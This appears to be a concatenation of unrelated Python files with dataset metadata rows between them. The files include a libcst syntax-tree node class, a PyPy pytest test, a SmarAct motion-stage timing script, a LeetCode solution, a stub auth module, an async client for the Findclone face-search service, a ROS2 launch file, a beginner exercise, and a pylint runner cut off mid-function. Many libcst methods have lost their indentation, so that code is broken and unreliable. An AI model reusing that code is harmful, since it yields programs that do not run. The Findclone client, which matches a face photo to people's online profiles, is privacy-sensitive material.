def _pretty_repr_sequence(seq: Sequence[object]) -> str:
    """Render a sequence as a multi-line, indented list literal."""
    if not seq:
        return "[]"
    lines = ["["]
    lines.extend(f"{_indent(repr(el))}," for el in seq)
    lines.append("]")
    return "\n".join(lines)
def _indent(value: str) -> str:
    """Prefix every line of ``value`` with four spaces."""
    return "\n".join("    " + line for line in value.split("\n"))
@dataclass(frozen=True)
class CSTNode(ABC):
    def __post_init__(self) -> None:
        """Run subclass-defined validation as soon as the node is built."""
        # PERF: It might make more sense to move validation work into the visitor, which
        # would allow us to avoid validating the tree when parsing a file.
        self._validate()
    @classmethod
    def __init_subclass__(cls, **kwargs: Any) -> None:
        """
        HACK: Add our implementation of `__repr__`, `__hash__`, and `__eq__` to the
        class's __dict__ to prevent dataclass from generating its own `__repr__`,
        `__hash__`, and `__eq__`.

        The alternative is to require each implementation of a node to remember to add
        `repr=False, eq=False`, which is more error-prone.
        """
        # NOTE: __init_subclass__ is implicitly a classmethod; the explicit
        # decorator above is redundant but harmless.
        super().__init_subclass__(**kwargs)
        # Only patch dunders the subclass did not define itself.
        if "__repr__" not in cls.__dict__:
            cls.__repr__ = CSTNode.__repr__
        if "__eq__" not in cls.__dict__:
            cls.__eq__ = CSTNode.__eq__
        if "__hash__" not in cls.__dict__:
            cls.__hash__ = CSTNode.__hash__
    def _validate(self) -> None:
        """
        Override this to perform runtime validation of a newly created node.

        The function is called during `__init__`. It should check for possible mistakes
        that wouldn't be caught by a static type checker.

        If you can't use a static type checker, and want to perform a runtime validation
        of this node's types, use `validate_types` instead.
        """
        # Intentionally a no-op in the base class; subclasses override it.
        pass
    def validate_types_shallow(self) -> None:
        """
        Compares the type annotations on a node's fields with those field's actual
        values at runtime. Raises a TypeError is a mismatch is found.

        Only validates the current node, not any of it's children. For a recursive
        version, see :func:`validate_types_deep`.

        If you're using a static type checker (highly recommended), this is useless.
        However, if your code doesn't use a static type checker, or if you're unable to
        statically type your code for some reason, you can use this method to help
        validate your tree.

        Some (non-typing) validation is done unconditionally during the construction of
        a node. That validation does not overlap with the work that
        :func:`validate_types_deep` does.
        """
        for f in fields(self):
            value = getattr(self, f.name)
            # ``f.type`` is the annotation declared on the dataclass field.
            if not is_value_of_type(value, f.type):
                raise TypeError(
                    f"Expected an instance of {f.type!r} on "
                    + f"{type(self).__name__}'s '{f.name}' field, but instead got "
                    + f"an instance of {type(value)!r}"
                )
def validate_types_deep(self) -> None:
"""
Like :func:`validate_types_shallow`, but recursively validates the whole tree.
"""
self.validate_types_shallow()
for ch in self.children:
ch.validate_types_deep()
    @property
    def children(self) -> Sequence["CSTNode"]:
        """
        The immediate (not transitive) child CSTNodes of the current node. Various
        properties on the nodes, such as string values, will not be visited if they are
        not a subclass of CSTNode.

        Iterable properties of the node (e.g. an IndentedBlock's body) will be flattened
        into the children's sequence.

        The children will always be returned in the same order that they appear
        lexically in the code.
        """
        # We're hooking into _visit_and_replace_children, which means that our current
        # implementation is slow. We may need to rethink and/or cache this if it becomes
        # a frequently accessed property.
        #
        # This probably won't be called frequently, because most child access will
        # probably through visit, or directly through named property access, not through
        # children.
        # The collection visitor returns False from on_visit, so only direct
        # (non-transitive) children are gathered.
        visitor = _ChildrenCollectionVisitor()
        self._visit_and_replace_children(visitor)
        return visitor.children
    def visit(
        self: _CSTNodeSelfT, visitor: CSTVisitorT
    ) -> Union[_CSTNodeSelfT, RemovalSentinel]:
        """
        Visits the current node, its children, and all transitive children using
        the given visitor's callbacks.
        """
        # visit self
        should_visit_children = visitor.on_visit(self)

        # TODO: provide traversal where children are not replaced
        # visit children (optionally)
        if should_visit_children:
            # It's not possible to define `_visit_and_replace_children` with the correct
            # return type in any sane way, so we're using this cast. See the
            # explanation above the declaration of `_visit_and_replace_children`.
            with_updated_children = cast(
                _CSTNodeSelfT, self._visit_and_replace_children(visitor)
            )
        else:
            with_updated_children = self

        # Read-only CSTVisitor instances never replace nodes: the original
        # node is returned and any updated children are discarded.
        if isinstance(visitor, CSTVisitor):
            visitor.on_leave(self)
            leave_result = self
        else:
            leave_result = visitor.on_leave(self, with_updated_children)

        # validate return type of the user-defined `visitor.on_leave` method
        if not isinstance(leave_result, (CSTNode, RemovalSentinel)):
            raise Exception(
                f"Expected a node of type CSTNode or a RemovalSentinel, "
                + f"but got a return value of {type(leave_result).__name__}"
            )

        # TODO: Run runtime typechecks against updated nodes
        return leave_result
# The return type of `_visit_and_replace_children` is `CSTNode`, not
# `_CSTNodeSelfT`. This is because pyre currently doesn't have a way to annotate
# classes as final. https://mypy.readthedocs.io/en/latest/final_attrs.html
#
# The issue is that any reasonable implementation of `_visit_and_replace_children`
# needs to refer to the class' own constructor:
#
# class While(CSTNode):
# def _visit_and_replace_children(self, visitor: CSTVisitorT) -> While:
# return While(...)
#
# You'll notice that because this implementation needs to call the `While`
# constructor, the return type is also `While`. This function is a valid subtype of
# `Callable[[CSTVisitorT], CSTNode]`.
#
# It is not a valid subtype of `Callable[[CSTVisitorT], _CSTNodeSelfT]`. That's
# because the return type of this function wouldn't be valid for any subclasses.
# In practice, that's not an issue, because we don't have any subclasses of `While`,
# but there's no way to tell pyre that without a `@final` annotation.
#
# Instead, we're just relying on an unchecked call to `cast()` in the `visit`
# method.
    @abstractmethod
    def _visit_and_replace_children(self, visitor: CSTVisitorT) -> "CSTNode":
        """
        Intended to be overridden by subclasses to provide a low-level hook for the
        visitor API.

        Don't call this directly. Instead, use `visitor.visit_and_replace_node` or
        `visitor.visit_and_replace_module`. If you need list of children, access the
        `children` property instead.

        The general expectation is that children should be visited in the order in which
        they appear lexically. Implementations construct and return a new node
        via their own class's constructor (see the comment block above).
        """
        ...
    def _is_removable(self) -> bool:
        """
        Intended to be overridden by nodes that will be iterated over inside
        Module and IndentedBlock. Returning true signifies that this node is
        essentially useless and can be dropped when doing a visit across it.
        """
        # Default: nodes are kept; only specific subclasses opt in to removal.
        return False
    @abstractmethod
    def _codegen_impl(self, state: CodegenState) -> None:
        """Subclass hook: emit this node's source code into ``state``.

        Called by ``_codegen``, which wraps it with position recording.
        """
        ...
def _codegen(self, state: CodegenState, **kwargs: Any) -> None:
start = CodePosition(state.line, state.column)
self._codegen_impl(state, **kwargs)
end = CodePosition(state.line, state.column)
state.record_position(self, CodeRange(start, end))
def with_changes(self: _CSTNodeSelfT, **changes: Any) -> _CSTNodeSelfT:
"""
A convenience method for performing mutation-like operations on immutable nodes.
Creates a new object of the same type, replacing fields with values from the
supplied keyword arguments.
For example, to update the test of an if conditional, you could do::
def leave_If(self, original_node: cst.If, updated_node: cst.If) -> cst.If:
new_node = updated_node.with_changes(test=new_conditional)
return new_node
``new_node`` will have the same ``body``, ``orelse``, and whitespace fields as
``updated_node``, but with the updated ``test`` field.
The accepted arguments match the arguments given to ``__init__``, however there
are no required or positional arguments.
TODO: This API is untyped. There's probably no sane way to type it using pyre's
current feature-set, but we should still think about ways to type this or a
similar API in the future.
"""
return replace(self, **changes)
def deep_clone(self: _CSTNodeSelfT) -> _CSTNodeSelfT:
"""
Recursively clone the entire tree. The created tree is a new tree has the same
representation but different identity.
>>> tree = cst.parse_expression("1+2")
>>> tree.deep_clone() == tree
False
>>> tree == tree
True
>>> tree.deep_equals(tree.deep_clone())
True
"""
cloned_fields: Dict[str, object] = {}
for field in fields(self):
key = field.name
if key[0] == "_":
continue
val = getattr(self, key)
# We can't use isinstance(val, CSTNode) here due to poor performance
# of isinstance checks against ABC direct subclasses. What we're trying
# to do here is recursively call this functionality on subclasses, but
# if the attribute isn't a CSTNode, fall back to copy.deepcopy.
try:
cloned_fields[key] = val.deep_clone()
except AttributeError:
cloned_fields[key] = deepcopy(val)
return type(self)(**cloned_fields)
def deep_equals(self, other: "CSTNode") -> bool:
"""
Recursively inspects the entire tree under ``self`` and ``other`` to determine if
the two trees are equal by representation instead of identity (``==``).
"""
from libcst._nodes.deep_equals import deep_equals as deep_equals_impl
return deep_equals_impl(self, other)
def deep_replace(
self: _CSTNodeSelfT, old_node: "CSTNode", new_node: CSTNodeT
) -> Union[_CSTNodeSelfT, CSTNodeT]:
"""
Recursively replaces any instance of ``old_node`` with ``new_node`` by identity.
Use this to avoid nested ``with_changes`` blocks when you are replacing one of
a node's deep children with a new node. Note that if you have previously
modified the tree in a way that ``old_node`` appears more than once as a deep
child, all instances will be replaced.
"""
new_tree = self.visit(_ChildrenReplacementTransformer(old_node, new_node))
if isinstance(new_tree, RemovalSentinel):
# The above transform never returns RemovalSentinel, so this isn't possible
raise Exception("Logic error, cannot get a RemovalSentinel here!")
return new_tree
def deep_remove(
self: _CSTNodeSelfT, old_node: "CSTNode"
) -> Union[_CSTNodeSelfT, RemovalSentinel]:
"""
Recursively removes any instance of ``old_node`` by identity. Note that if you
have previously modified the tree in a way that ``old_node`` appears more than
once as a deep child, all instances will be removed.
"""
return self.visit(
_ChildrenReplacementTransformer(old_node, RemovalSentinel.REMOVE)
)
def __eq__(self: _CSTNodeSelfT, other: _CSTNodeSelfT) -> bool:
"""
CSTNodes are only treated as equal by identity. This matches the behavior of
CPython's AST nodes.
If you actually want to compare the value instead of the identity of the current
node with another, use `node.deep_equals`. Because `deep_equals` must traverse
the entire tree, it can have an unexpectedly large time complexity.
We're not exposing value equality as the default behavior because of
`deep_equals`'s large time complexity.
"""
return self is other
def __hash__(self) -> int:
# Equality of nodes is based on identity, so the hash should be too.
return id(self)
def __repr__(self) -> str:
if len(fields(self)) == 0:
return f"{type(self).__name__}()"
lines = [f"{type(self).__name__}("]
for f in fields(self):
key = f.name
if key[0] != "_":
value = getattr(self, key)
lines.append(_indent(f"{key}={_pretty_repr(value)},"))
lines.append(")")
return "\n".join(lines)
@classmethod
def field(cls, *args: object, **kwargs: object) -> Any:
"""
A helper that allows us to easily use CSTNodes in dataclass constructor
defaults without accidentally aliasing nodes by identity across multiple
instances.
"""
# pyre-ignore Pyre is complaining about CSTNode not being instantiable,
# but we're only going to call this from concrete subclasses.
return field(default_factory=lambda: cls(*args, **kwargs))
class BaseLeaf(CSTNode, ABC):
    """
    Common behavior for nodes that can never have children.
    """

    @property
    def children(self) -> Sequence[CSTNode]:
        # Optimized override: leaves share a single empty sequence
        # instead of computing their (always empty) child list.
        return _EMPTY_SEQUENCE

    def _visit_and_replace_children(
        self: _CSTNodeSelfT, visitor: CSTVisitorT
    ) -> _CSTNodeSelfT:
        # With no children to visit or replace, the node itself is the
        # correct result.
        return self
class BaseValueToken(BaseLeaf, ABC):
    """
    Common behavior for the subset of leaf nodes that only wrap a value.

    Not every tokenizer token exists as a BaseValueToken: where a token
    is always a constant value (e.g. a COLON token), its value is
    implicitly folded into the parent CSTNode and hard-coded into the
    parent's implementation of ``_codegen``.
    """

    value: str

    def _codegen_impl(self, state: CodegenState) -> None:
        state.add_token(self.value)
| 37.688742 | 89 | 0.649856 |
c25de9a41bdf3aa87bedd4ce9b6480b14619d153 | 1,235 | py | Python | pypy/tool/test/test_conftest1.py | woodrow/pyoac | b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7 | [
"MIT"
] | 1 | 2019-05-27T00:58:46.000Z | 2019-05-27T00:58:46.000Z | pypy/tool/test/test_conftest1.py | woodrow/pyoac | b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7 | [
"MIT"
] | null | null | null | pypy/tool/test/test_conftest1.py | woodrow/pyoac | b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7 | [
"MIT"
] | null | null | null |
import py
innertest = py.magic.autopath().dirpath('conftest1_innertest.py')  # fixture test file that lives next to this one
pytest_plugins = "pytest_pytester"  # provides the ``testdir`` fixture used below
class TestPyPyTests:
    """Check that pytest ``-k`` selection picks the expected PyPy tests.

    Each test runs ``conftest1_innertest.py`` through an in-process
    pytest run (``testdir.inline_run``) and inspects which items passed.
    """

    def test_select_interplevel(self, testdir):
        # Only the two interp-level tests should be collected and pass.
        sorter = testdir.inline_run("-k", "interplevel", innertest)
        passed, skipped, failed = sorter.listoutcomes()
        assert len(passed) == 2
        assert not skipped and not failed
        for repevent in passed:
            assert repevent.colitem.name in ('test_something', 'test_method')

    def test_select_applevel(self, testdir):
        # Only the two app-level tests should be collected and pass.
        sorter = testdir.inline_run("-k", "applevel", innertest)
        passed, skipped, failed = sorter.listoutcomes()
        assert len(passed) == 2
        assert not skipped and not failed
        for repevent in passed:
            assert repevent.colitem.name in ('app_test_something', 'test_method_app')

    def test_appdirect(self, testdir):
        # With --runappdirect, app-level tests run directly on the host.
        sorter = testdir.inline_run(innertest, '-k', 'applevel', '--runappdirect')
        passed, skipped, failed = sorter.listoutcomes()
        assert len(passed) == 2
        # Function-call form instead of the Python 2 print statement, so
        # the file also parses under Python 3; with a single argument the
        # output is identical under Python 2.
        print(passed)
        names = [x.colitem.name for x in passed]
        assert 'app_test_something' in names
        assert 'test_method_app' in names
| 37.424242 | 85 | 0.654251 |
80849c1c1bd484cad89d4f4e107c1ef2fdc0a636 | 1,119 | py | Python | software/temcagt/smaract/tests/04_sync_vs_async.py | htem/GridTapeStage | 0b4764bc4ea8d64970ea481a32d6c7383d301989 | [
"RSA-MD"
] | 2 | 2020-02-07T10:34:23.000Z | 2021-09-24T02:28:10.000Z | software/temcagt/smaract/tests/04_sync_vs_async.py | htem/GridTapeStage | 0b4764bc4ea8d64970ea481a32d6c7383d301989 | [
"RSA-MD"
] | null | null | null | software/temcagt/smaract/tests/04_sync_vs_async.py | htem/GridTapeStage | 0b4764bc4ea8d64970ea481a32d6c7383d301989 | [
"RSA-MD"
] | null | null | null | #!/usr/bin/env python
import time
import smaract
import smaract.async
channel = 0
distance = 16000
l = 'usb:id:xxxxxxx'
# first try sync
#locs = smaract.find_systems()
#print locs
#l = locs[0]
#if len(l) == 0:
# raise Exception("No systems found")
print("Connecting to: %s" % l)
# sync
m = smaract.MCS(l)
t0 = time.time()
m.move_relative(channel, distance)
while m.status(0) != 0:
pass
t1 = time.time()
print("Sync move: %s" % (t1 - t0))
t0 = time.time()
p = m.position(channel)
t1 = time.time()
print("Sync pos: %s" % (t1 - t0))
t0 = time.time()
m.move_relative(channel, distance)
while m.status(0) != 0:
pass
p = m.position(channel)
t1 = time.time()
print("Sync pos: %s" % (t1 - t0))
m.disconnect()
# async
m = smaract.AMCS(l)
t0 = time.time()
m.move_relative(channel, -distance)
m.wait(0)
t1 = time.time()
print("ASync move: %s" % (t1 - t0))
t0 = time.time()
position = m.position(channel)
t1 = time.time()
print("ASync pos: %s" % (t1 - t0))
t0 = time.time()
m.move_relative(channel, -distance)
m.wait(0)
p = m.position(0)
t1 = time.time()
print("ASync pos: %s" % (t1 - t0))
m.disconnect()
| 16.455882 | 40 | 0.634495 |
ee0d1260a62afb742e1cfef37929b1b869416ca7 | 662 | py | Python | Python3/0129-Sum-Root-to-Leaf-Numbers/soln.py | wyaadarsh/LeetCode-Solutions | 3719f5cb059eefd66b83eb8ae990652f4b7fd124 | [
"MIT"
] | 5 | 2020-07-24T17:48:59.000Z | 2020-12-21T05:56:00.000Z | Python3/0129-Sum-Root-to-Leaf-Numbers/soln.py | zhangyaqi1989/LeetCode-Solutions | 2655a1ffc8678ad1de6c24295071308a18c5dc6e | [
"MIT"
] | null | null | null | Python3/0129-Sum-Root-to-Leaf-Numbers/soln.py | zhangyaqi1989/LeetCode-Solutions | 2655a1ffc8678ad1de6c24295071308a18c5dc6e | [
"MIT"
] | 2 | 2020-07-24T17:49:01.000Z | 2020-08-31T19:57:35.000Z | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def sumNumbers(self, root):
"""
:type root: TreeNode
:rtype: int
"""
def traverse(node, val):
if node is not None:
val = val * 10 + node.val
if node.left is None and node.right is None:
return val
else:
return traverse(node.left, val) + traverse(node.right, val)
else:
return 0
return traverse(root, 0)
| 27.583333 | 79 | 0.480363 |
122cd2a05861517a6301546ef5f01a04c21114ef | 1,071 | py | Python | app/v1/modules/auth/__init__.py | speduardo/flask-boilerplate | d50d8d0f15a08c4905a2029b0ae9637489624c9a | [
"MIT"
] | 1 | 2020-05-26T01:53:58.000Z | 2020-05-26T01:53:58.000Z | app/v1/modules/auth/__init__.py | speduardo/flask-boilerplate | d50d8d0f15a08c4905a2029b0ae9637489624c9a | [
"MIT"
] | null | null | null | app/v1/modules/auth/__init__.py | speduardo/flask-boilerplate | d50d8d0f15a08c4905a2029b0ae9637489624c9a | [
"MIT"
] | null | null | null | """
Auth module
===========
"""
#from app.extensions import login_manager, oauth2
from app.v1.core.api import api_v1
def load_user_from_request(request):
    """
    Load user from OAuth2 Authentication header.

    Currently a stub: the OAuth2 wiring is commented out, so this always
    returns ``None`` and ``request`` goes unused until it is re-enabled.
    """
    user = None
    #if hasattr(request, 'oauth'):
    #    user = request.oauth.user
    #else:
    #    is_valid, oauth = oauth2.verify_request(scopes=[])
    #    if is_valid:
    #        user = oauth.user
    return user
def init_app(app, **kwargs):
    # pylint: disable=unused-argument
    """
    Init auth module.

    Registers the auth resources on the v1 API namespace. The
    Flask-Login / OAuth scope wiring is currently commented out.
    """
    # Bind Flask-Login for current_user
    #login_manager.request_loader(load_user_from_request)
    # Register OAuth scopes
    #api_v1.add_oauth_scope('auth:read', "Provide access to auth details")
    #api_v1.add_oauth_scope('auth:write', "Provide write access to auth details")
    # Touch underlying modules (importing them has registration side effects)
    from . import models, views, resources  # pylint: disable=unused-import
    # Mount authentication routes
    #app.register_blueprint(views.auth_blueprint)
    api_v1.add_namespace(resources.api)
| 26.121951 | 81 | 0.674136 |
c4bc61d832484a34ae928af094d25db9bd925929 | 6,262 | py | Python | Findclone/aiofindclone.py | vypivshiy/Findclone_api | 97ec5f33929b5cd3bdf670d829596749c3797dbc | [
"MIT"
] | 5 | 2020-11-16T11:41:05.000Z | 2021-09-09T22:54:37.000Z | Findclone/aiofindclone.py | vypivshiy/Findclone_api | 97ec5f33929b5cd3bdf670d829596749c3797dbc | [
"MIT"
] | 2 | 2021-05-02T21:34:47.000Z | 2021-08-21T23:30:44.000Z | Findclone/aiofindclone.py | vypivshiy/Findclone_api | 97ec5f33929b5cd3bdf670d829596749c3797dbc | [
"MIT"
] | 2 | 2021-04-27T01:14:15.000Z | 2021-09-30T06:44:40.000Z | from aiohttp import ClientSession, FormData
from Findclone import __version__
from .models import Account, Profiles, Histories, get_builder
from .utils import random_string, paint_boxes
from .exceptions import a_error_handler, FindcloneError
from io import BufferedReader, BytesIO
class FindcloneAsync:
    """Asynchronous client for the findclone.ru API.

    Attributes:
        headers : dict - headers (user agent plus, after login, the
            session credentials) sent with every request.
    """

    def __init__(self):
        self._session = ClientSession()
        self.headers = {"User-Agent": f"findclone-api/{__version__}"}
        self.__builder = get_builder().build_aio_response
        self._session_key = None
        self._userid = None
        self.__info = None  # cached Account, filled by login()/info

    async def login(self,
                    login: Optional[str] = None,
                    password: Optional[str] = None,
                    session_key: Optional[str] = None,
                    userid: Union[str, int, None] = None) -> bool:
        """
        *coro
        Findclone authorisation, either with login/password or with a
        previously saved session.
        :param login: account login
        :param password: account password
        :param session_key: account session_key
        :param userid: account userid
        :return: True if auth succeeds
        :raises FindcloneError: if neither credential pair is supplied
        """
        if login and password:
            async with self._session.post("https://findclone.ru/login",
                                          data={"phone": login, "password": password}) as response:
                await a_error_handler(response)
                resp = await response.json()
                self.__info = await self.__builder(response)
                self._session_key = resp["session_key"]
                self._userid = resp["userid"]
                self.headers.update({'session-key': self._session_key, 'user-id': str(self._userid)})
            return True
        if session_key and userid:
            self.headers.update({"session-key": session_key, "user-id": str(userid)})
            async with self._session.get("https://findclone.ru/profile", headers=self.headers) as response:
                await a_error_handler(response)
                self.__info = await self.__builder(response)
            self._session_key = session_key
            self._userid = userid
            return True
        raise FindcloneError("Need login and password or session-key and _userid")

    @property
    async def info(self) -> Account:
        """
        *coro
        Fetch (and cache) the account information.
        :return: Account object
        """
        async with self._session.get("https://findclone.ru/profile", headers=self.headers) as response:
            info = await self.__builder(response)
        self.__info = info
        return info

    async def upload(self,
                     file: Union[str, BufferedReader],
                     face_box_id: Optional[int] = None,
                     timeout: float = 180) -> Union[Profiles, BytesIO]:
        """
        *coro
        Upload an image (direct URL, local path, or open binary file) and
        search it.
        :param file: image URL, local file path, or an open binary file
        :param face_box_id: OPTIONAL, face box to use if 2 or more faces
            are detected
        :param timeout: OPTIONAL, max request duration in seconds
        :return: Profiles object, or a BytesIO with the detected boxes
            drawn when several faces are found and no face_box_id is given
        """
        if isinstance(file, str) and file.startswith("http"):
            # Remote image: download the raw bytes first.
            async with self._session.get(file, headers=self.headers) as response:
                payload = await response.read()
        elif isinstance(file, str):
            # Local path: read and close the file. The previous version
            # handed an open file object to FormData and leaked the handle.
            with open(file, "rb") as fh:
                payload = fh.read()
        else:
            # Open binary file object, as advertised by the signature
            # (previously this path crashed on the str-only .startswith).
            payload = file.read()
        data = FormData()
        data.add_field("uploaded_photo", payload, filename=f"{random_string()}.png",
                       content_type="image/png")
        async with self._session.post("https://findclone.ru/upload2", data=data,
                                      headers=self.headers, timeout=timeout) as response:
            resp = await response.json()
            if resp.get("faceBoxes"):
                if face_box_id is not None:
                    async with self._session.get("https://findclone.ru/upload3",
                                                 params={"id": face_box_id},
                                                 headers=self.headers) as response2:
                        return await self.__builder(response2)
                # Several faces and no explicit choice: return the image
                # with the detected boxes drawn so the caller can pick one.
                return paint_boxes(payload, resp)
            return await self.__builder(response)

    async def history(self, offset: int = 0, count: int = 100) -> Histories:
        """
        *coro
        Return the account's search history.
        :param offset: pagination offset
        :param count: page size
        :return: Histories object
        """
        async with self._session.get("https://findclone.ru/hist",
                                     params={"offset": offset, "count": count},
                                     headers=self.headers) as response:
            return await self.__builder(response)

    async def search(self, search_id: Union[int, str], count: int = 128) -> Profiles:
        """
        *coro
        Fetch the results of a previous search.
        :param search_id: search id
        :param count: max number of profiles to fetch
        :return: Profiles object
        """
        async with self._session.get("https://findclone.ru/search",
                                     params={"id": search_id, "count": count},
                                     headers=self.headers) as response:
            return await self.__builder(response)

    @property
    def get_session(self) -> dict:
        """
        Return the stored session credentials.
        :return: dict {"session-key": session_key, "user-id": userid}
        """
        return {"session-key": self._session_key, "user-id": self._userid}

    def __str__(self):
        return self.__info.__str__()

    async def __aenter__(self) -> 'FindcloneAsync':
        return self

    async def __aexit__(self, exc_type, exc_val, exc_tb) -> None:
        await self._session.close()

    async def close(self) -> None:
        await self._session.close()
| 40.928105 | 115 | 0.569946 |
30d96561bfd1a9779a11f8ee639d19b0ff384b9b | 523 | py | Python | crazyswarm2/launch/teleop_launch.py | akmaralAW/crazyswarm2 | f5bbe893eacd860b5d712a4beaf8bd5d8fb505f8 | [
"MIT"
] | 9 | 2021-11-07T02:26:13.000Z | 2022-03-05T09:49:35.000Z | crazyswarm2/launch/teleop_launch.py | akmaralAW/crazyswarm2 | f5bbe893eacd860b5d712a4beaf8bd5d8fb505f8 | [
"MIT"
] | 13 | 2021-11-05T18:20:24.000Z | 2022-03-02T12:53:52.000Z | crazyswarm2/launch/teleop_launch.py | akmaralAW/crazyswarm2 | f5bbe893eacd860b5d712a4beaf8bd5d8fb505f8 | [
"MIT"
] | 2 | 2021-11-08T19:25:28.000Z | 2021-12-06T16:45:48.000Z | from launch import LaunchDescription
from launch_ros.actions import Node
def generate_launch_description():
return LaunchDescription([
Node(
package='crazyswarm2',
executable='teleop',
name='teleop'
),
Node(
package='joy',
executable='joy_node',
name='joy_node'
),
Node(
package='crazyswarm2',
executable='crazyswarm2_server',
name='crazyswarm2_server'
)
])
| 23.772727 | 44 | 0.537285 |
1122df2a03147df4aa8af8ed67432e671cd4d20b | 929 | py | Python | CursoEmVideo/Mundo2_EstruturasDeControle/desafio065.py | jacksontenorio8/python | a484f019960faa5aa29177eff44a1bb1e3f3b9d0 | [
"MIT"
] | null | null | null | CursoEmVideo/Mundo2_EstruturasDeControle/desafio065.py | jacksontenorio8/python | a484f019960faa5aa29177eff44a1bb1e3f3b9d0 | [
"MIT"
] | null | null | null | CursoEmVideo/Mundo2_EstruturasDeControle/desafio065.py | jacksontenorio8/python | a484f019960faa5aa29177eff44a1bb1e3f3b9d0 | [
"MIT"
] | null | null | null | '''
@jacksontenorio8
Crie um programa que leia vários números inteiros pelo teclado. No final
da execução, mostre a média entre todos os valores e qual foi o maior e o
menor valores lidos. O programa deve perguntar ao usuário se ele quer ou
não continuar a digitar valores.
'''
resposta = 'S'
soma = quantidade = media = maior = menor = 0
while resposta in 'Ss':
numero = int(input('Digite um número: '))
soma += numero
quantidade += 1
if quantidade == 1:
maior = menor = numero
else:
if numero > maior:
maior = numero
if numero < menor:
menor = numero
resposta = str(input('Quer continuar? [S/N] ')).upper().strip()[0] #Transforma em maiúsculas, remove os espaços e considera só a primeira letra.
media = soma / quantidade
print(f'Você digitou {quantidade} números e a média foi {media}.')
print(f'O maior valor {maior} e o menor valor foi {menor}.')
| 37.16 | 148 | 0.666308 |
73ed6cbb71d0b484f24a640d2838c10c12dda6c9 | 7,406 | py | Python | dev/pylint_check.py | rw1nkler/vtr-verilog-to-routing | 74c8dbe1b3aca45c570f79feca0f4b3062e51b6a | [
"MIT"
] | null | null | null | dev/pylint_check.py | rw1nkler/vtr-verilog-to-routing | 74c8dbe1b3aca45c570f79feca0f4b3062e51b6a | [
"MIT"
] | null | null | null | dev/pylint_check.py | rw1nkler/vtr-verilog-to-routing | 74c8dbe1b3aca45c570f79feca0f4b3062e51b6a | [
"MIT"
] | 1 | 2020-07-22T08:11:40.000Z | 2020-07-22T08:11:40.000Z | #!/usr/bin/python3
"""
This script runs pylint on all of the paths specified by 'paths_to_lint'.
It prints the output of pylint for each path.
The returncode is the number of files that fail pylint.
"""
import pathlib
import sys
import subprocess
import argparse
# Repository root, derived from this script's location (dev/..).
repo_path = pathlib.Path(__file__).parent.parent.absolute()

################################################################################
################################# Paths to lint ################################
################################################################################

# List of all paths to search for Python files, and whether the search
# should be recursive.
paths_to_lint = [
    (repo_path, False),
    (repo_path / "dev", True),
    (repo_path / "ODIN_II", True),
    (repo_path / "ace2", True),
    (repo_path / "doc", True),
    (repo_path / "vpr", True),
    (repo_path / "vtr_flow", True),
]

# These python files existed before the linter.
# At some point they should be cleaned up and removed from this list
# (they are skipped unless --check_grandfathered is passed).
grandfathered_files = [
    repo_path / "sweep_build_configs.py",
    repo_path / "dev/vtr_gdb_pretty_printers.py",
    repo_path / "dev/submit_slurm.py",
    repo_path / "dev/code_format_fixup.py",
    repo_path / "dev/annealing_curve_plotter.py",
    repo_path / "dev/autoformat.py",
    repo_path / "dev/vpr_animate.py",
    repo_path / "dev/external_subtrees.py",
    repo_path / "ODIN_II/usefull_tools/restore_blackboxed_latches_from_blif_file.py",
    repo_path / "ODIN_II/regression_test/parse_result/parse_result.py",
    repo_path / "ODIN_II/regression_test/parse_result/conf/hooks.py",
    repo_path / "ODIN_II/regression_test/tools/parse_odin_result.py",
    repo_path / "ODIN_II/regression_test/tools/odin_script_util.py",
    repo_path / "ODIN_II/regression_test/tools/ODIN_CONFIG.py",
    repo_path / "ODIN_II/regression_test/tools/synth_using_quartus.py",
    repo_path / "ODIN_II/regression_test/tools/odin_config_maker.py",
    repo_path / "ODIN_II/regression_test/tools/synth_using_vl2mv.py",
    repo_path / "ODIN_II/regression_test/tools/synth_using_odin.py",
    repo_path / "ODIN_II/regression_test/tools/asr_vector_maker.py",
    repo_path / "ODIN_II/regression_test/tools/8_bit_arithmetic_power_output.py",
    repo_path / "ODIN_II/regression_test/tools/8_bit_input.py",
    repo_path / "ace2/scripts/extract_clk_from_blif.py",
    repo_path / "doc/src/vtr_version.py",
    repo_path / "doc/src/conf.py",
    repo_path / "doc/_exts/rrgraphdomain/__init__.py",
    repo_path / "doc/_exts/sdcdomain/__init__.py",
    repo_path / "doc/_exts/archdomain/__init__.py",
    repo_path / "vpr/scripts/compare_timing_reports.py",
    repo_path / "vpr/scripts/profile/util.py",
    repo_path / "vpr/scripts/profile/parse_and_plot_detailed.py",
    repo_path / "vtr_flow/scripts/upgrade_arch.py",
    repo_path / "vtr_flow/scripts/download_titan.py",
    repo_path / "vtr_flow/scripts/ispd2vtr.py",
    repo_path / "vtr_flow/scripts/download_ispd.py",
    repo_path / "vtr_flow/scripts/qor_compare.py",
    repo_path / "vtr_flow/scripts/blif_splicer.py",
    repo_path / "vtr_flow/scripts/benchtracker/interface_db.py",
    repo_path / "vtr_flow/scripts/benchtracker/server_db.py",
    repo_path / "vtr_flow/scripts/benchtracker/util.py",
    repo_path / "vtr_flow/scripts/benchtracker/plotter-offline.py",
    repo_path / "vtr_flow/scripts/benchtracker/populate_db.py",
    repo_path / "vtr_flow/scripts/benchtracker/flask_cors/core.py",
    repo_path / "vtr_flow/scripts/benchtracker/flask_cors/version.py",
    repo_path / "vtr_flow/scripts/benchtracker/flask_cors/six.py",
    repo_path / "vtr_flow/scripts/benchtracker/flask_cors/decorator.py",
    repo_path / "vtr_flow/scripts/benchtracker/flask_cors/extension.py",
    repo_path / "vtr_flow/scripts/python_libs/utils.py",
    repo_path / "vtr_flow/scripts/arch_gen/arch_gen.py",
    repo_path / "vtr_flow/scripts/spice/run_spice.py",
]
################################################################################
################################################################################
################################################################################
class TermColor:
    """ Terminal codes for printing in color """

    # pylint: disable=too-few-public-methods

    # ANSI escape sequences; END resets all attributes.
    PURPLE = "\033[95m"
    BLUE = "\033[94m"
    GREEN = "\033[92m"
    YELLOW = "\033[93m"
    RED = "\033[91m"
    END = "\033[0m"
    BOLD = "\033[1m"
    UNDERLINE = "\033[4m"
def error(*msg, returncode=-1):
    """ Print an error message in red and exit with *returncode*. """
    rendered = " ".join(str(item) for item in msg)
    print(TermColor.RED + "ERROR:", rendered, TermColor.END)
    sys.exit(returncode)
def expand_paths():
